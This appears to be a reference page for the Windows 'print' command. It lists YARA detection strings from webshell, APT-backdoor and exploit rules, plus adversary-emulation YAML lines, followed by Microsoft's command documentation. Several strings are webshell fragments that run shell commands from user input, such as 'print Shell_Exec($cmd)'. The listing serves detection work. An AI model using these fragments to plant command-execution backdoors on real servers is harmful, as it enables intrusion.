signature-base apt_pulsesecure.yar $s6 = "print MIME::Base64::encode(RC4(" CC BY-NC 4.0
signature-base apt_sandworm_centreon.yar $pl_socket = "socket(SOCKET, PF_INET, SOCK_STREAM,$tcp) or die print "$l$e$!$l" CC BY-NC 4.0
signature-base apt_sandworm_centreon.yar $msg1 = "print "$l OK! I\'m successful connected.$l"" CC BY-NC 4.0
signature-base apt_sandworm_centreon.yar $msg2 = "print "$l OK! I\'m accept connection.$l"" CC BY-NC 4.0
signature-base cn_pentestset_scripts.yar $s0 = "print "[*] Connected to remote host \n"; " fullword ascii /* PEStudio Blacklist: strings */ CC BY-NC 4.0
signature-base cn_pentestset_scripts.yar $s1 = "print "Usage: $0 [Host] [Port] \n\n"; " fullword ascii /* PEStudio Blacklist: strings */ CC BY-NC 4.0
signature-base cn_pentestset_scripts.yar $s5 = "print "[*] Resolving HostName\n"; " fullword ascii /* PEStudio Blacklist: strings */ CC BY-NC 4.0
signature-base exploit_shitrix.yar $s07 = "template.new({'BLOCK'='print readpipe(" ascii /* TrustedSec templae */ CC BY-NC 4.0
signature-base gen_cn_webshells.yar $s3 = “out.print("Hi,Man 2015
");” fullword ascii
CC BY-NC 4.0
signature-base gen_cn_webshells.yar $s6 = “out.print("</pre>");” fullword ascii CC BY-NC 4.0
signature-base gen_cn_webshells.yar $s7 = “out.print("<pre>");” fullword ascii CC BY-NC 4.0
signature-base gen_cn_webshells.yar $s4 = “out.print("Hi,Man 2015");” fullword ascii CC BY-NC 4.0
signature-base thor-webshells.yar $s4 = “print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&” CC BY-NC 4.0
signature-base thor-webshells.yar $s0 = “ out.print("<tr><td width='60%'>"+strCut(convertPath(list[i].getPath()),7” CC BY-NC 4.0
signature-base thor-webshells.yar $s0 = “</font><%out.print(request.getRealPath(request.getServletPath())); %>” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s4 = “print "<form action=\"".$me."?p=cmd&dir=".realpath(‘.’)."” CC BY-NC 4.0
signature-base thor-webshells.yar $s8 = “print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&di” CC BY-NC 4.0
signature-base thor-webshells.yar $s1 = “print "\n".’Tip: to view the file "as is" - open the page in <a href="‘.Dx” CC BY-NC 4.0
signature-base thor-webshells.yar $s9 = “if(cmd.equals("Szh0ZWFt")){out.print("[S]"+dir+"[E]");}” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “out.print(") <A Style=’Color: " + fcolor.toString() + ";’ HRef=’?file=" + fn” CC BY-NC 4.0
signature-base thor-webshells.yar $s7 = “if(flist[i].canRead() == true) out.print("r" ); else out.print("-");” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s5 = “print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">Filenam” CC BY-NC 4.0
signature-base thor-webshells.yar $s8 = “print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">File: </” CC BY-NC 4.0
signature-base thor-webshells.yar $s0 = “copy ( $dosya_gonder2, "$dir/$dosya_gonder2_name") ? print("$dosya_gonder2_na” CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “python -c"import md5;x=md5.new('you_password');print x.hexdigest()"” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s0 = “print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx” CC BY-NC 4.0
signature-base thor-webshells.yar $s1 = “print "Sending mail to $to....... ";” CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “print "Asmodeus Perl Remote Shell” CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “print "\n".'<tr><td width=100pt class=linelisting>POST (php eval)</td><” CC BY-NC 4.0
signature-base thor-webshells.yar $s1 = “print "<tr><td>Server is:</td><td>".$_SERVER['SERVER_SIGNATURE']."</td” CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “print "<tr><td>Execute command:</td><td><input size=100 name=\"_cmd” CC BY-NC 4.0
signature-base thor-webshells.yar $s3 = “print "error; help: head -n 16 d00r.py"” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s4 = “print "PW:",PW,"PORT:",PORT,"HOST:",HOST” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s3 = “print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&” CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie” CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “print(" Provenance du mail : <input type=\"text\" name=\"provenanc” CC BY-NC 4.0
signature-base thor-webshells.yar $s3 = “<? if($cmd != "") print Shell_Exec($cmd);?>” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s8 = “print "<form action=\"".$me."?p=chmod&file=".$content."&d” CC BY-NC 4.0
signature-base thor-webshells.yar $s18 = “print shell_exec($command);” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s5 = “print "<h1>#worst @dal.net</h1>";” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s7 = “print "<h1>Linux Shells</h1>";” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s14 = “print "<tr><td>System type:</td><td>$UName</td></tr>";” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s20 = “print "Transfered $TargetFileSize Bytes. ";” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s12 = “print "Sending mail to $to....... "; ” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s4 = “<? if($cmd != "") print Shell_Exec($cmd);?>” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s12 = “print << "[kalabanga]";” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s5 = “print " [ Generation time: \".round(getTime()-startTime,4).\" second"” CC BY-NC 4.0
signature-base thor-webshells.yar $s6 = “print "Sorry, none of the command functions works.";” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s3 = “print("<p align=\"center\"><font size=\"5\">Exploit include ” CC BY-NC 4.0
stockpile b007fe0c-c6b0-4fda-915c-255bbc070de2.yml description: copy the contents for the clipboard and print them Apache-2.0
stockpile 6c91884e-11ec-422f-a6ed-e76774b0daac.yml - source: host.print.file Apache-2.0
stockpile 6c91884e-11ec-422f-a6ed-e76774b0daac.yml target: host.print.size Apache-2.0
stockpile 6e1a53c0-7352-4899-be35-fa7f364d5722.yml name: Print Working Directory Apache-2.0
stockpile 6e1a53c0-7352-4899-be35-fa7f364d5722.yml description: Print the current working directory on the system Apache-2.0
stockpile a41c2324-8c63-4b15-b3c5-84f920d1f226.yml command: 'find ~ -type f -name #{host.print.file} 2>/dev/null' Apache-2.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


print

Sends a text file to a printer. A file can print in the background if you send it to a printer connected to a serial or parallel port on the local computer.

Note: You can perform many configuration tasks from the command prompt by using the Mode command, including configuring a printer connected to a parallel or a serial port, displaying printer status, or preparing a printer for code page switching.

Syntax

print [/d:<printername>] [<drive>:][<path>]<filename>[ ...]

Parameters

Parameter Description
/d:<printername> Specifies the printer to which you want to send the print job. To print to a locally connected printer, specify the port on your computer where the printer is connected. Valid values for parallel ports are LPT1, LPT2, and LPT3. Valid values for serial ports are COM1, COM2, COM3, and COM4. You can also specify a network printer by using its queue name (\\server_name\printer_name). If you don’t specify a printer, the print job is sent to LPT1 by default.
<drive>: Specifies the logical or physical drive where the file you want to print is located. This parameter isn’t required if the file you want to print is located on the current drive.
<path> Specifies the location of the file you want to print. This parameter isn’t required if the file you want to print is located in the current directory.
<filename>[ ...] Required. Specifies the file you want to print. You can include multiple files in one command.
/? Displays help at the command prompt.

Examples

To send the report.txt file, located in the current directory, to a printer connected to lpt2 on the local computer, type:

print /d:lpt2 report.txt

To send the report.txt file, located in the c:\accounting directory, to the printer1 print queue on the \\copyroom server, type:

print /d:\\copyroom\printer1 c:\accounting\report.txt

MIT License. Copyright (c) 2020-2021 Strontic.